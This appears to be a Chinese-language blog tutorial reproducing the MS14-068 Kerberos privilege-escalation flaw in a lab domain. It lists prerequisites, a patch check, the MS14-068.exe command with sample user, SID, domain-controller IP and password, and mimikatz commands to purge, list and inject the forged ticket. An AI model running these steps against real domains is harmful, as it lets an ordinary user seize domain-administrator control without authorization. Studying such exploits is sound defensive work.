域滲透之MS14-68域提權漏洞

域滲透之MS14-68域提權漏洞

漏洞概述

漏洞可能允許攻擊者將未經授權的域用戶賬戶的權限,提權到域管理員的權限。

利用條件

域控機器沒有打MS14-068的補丁(KB3011780)

需要一個域內用戶和域內用戶密碼或hash,域內用戶的suid

漏洞原理

服務票據是客戶端直接發送給服務器,並請求服務資源的。如果服務器沒有向域控dc驗證pac的話,那麼客戶端可以僞造域管的權限來訪問服務器

MS14-068漏洞分析:Kerberos協議探索系列之票據篇

Kerberos認證原理

漏洞復現

Ms14-068利用工具

查詢域控機器是否存在該補丁

systeminfo |find "3011780"
C:\Users\douser\Desktop>dir \\192.168.183.130\c$
拒絕訪問。

使用普通用戶權限,測試訪問域控的C盤共享,訪問被拒絕

MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>
MS14-068.exe -u douser@demo -s S-1-5-21-979886063-111190
0045-1414766810-1107 -d 192.168.183.130 -p Dotest123

這裏獲取到一個[email protected]文件

清空票據

kerberos::purge //清空已有票據

kerberos::list  //查看票據

注入票據

kerberos::ptc [email protected]

mimikatz 不支持03系統注入

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章